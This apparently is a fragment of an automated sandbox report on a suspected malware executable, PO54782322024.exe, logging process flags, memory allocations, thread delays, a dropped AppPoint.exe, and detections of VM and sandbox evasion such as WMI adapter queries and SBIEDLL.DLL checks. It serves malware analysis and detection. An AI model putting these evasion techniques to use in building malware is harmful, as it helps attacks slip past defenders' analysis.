Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO54782322024.exe PID: 6844, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\PO54782322024.exe	Memory allocated: 17F04530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Memory allocated: 17F1DF10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory allocated: 4DE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599757	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598668	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598442	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595528	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594765	Jump to behavior
